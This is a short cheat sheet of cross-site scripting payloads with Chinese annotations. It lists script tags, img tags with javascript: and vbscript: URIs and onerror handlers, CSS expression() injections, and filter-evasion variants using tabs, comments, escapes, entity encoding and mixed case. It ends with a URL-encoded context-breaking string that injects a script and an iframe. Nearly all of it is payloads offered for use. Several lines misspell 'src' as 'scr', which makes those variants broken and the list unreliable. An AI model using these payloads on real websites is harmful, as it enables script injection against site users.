<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the ???? stands for whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["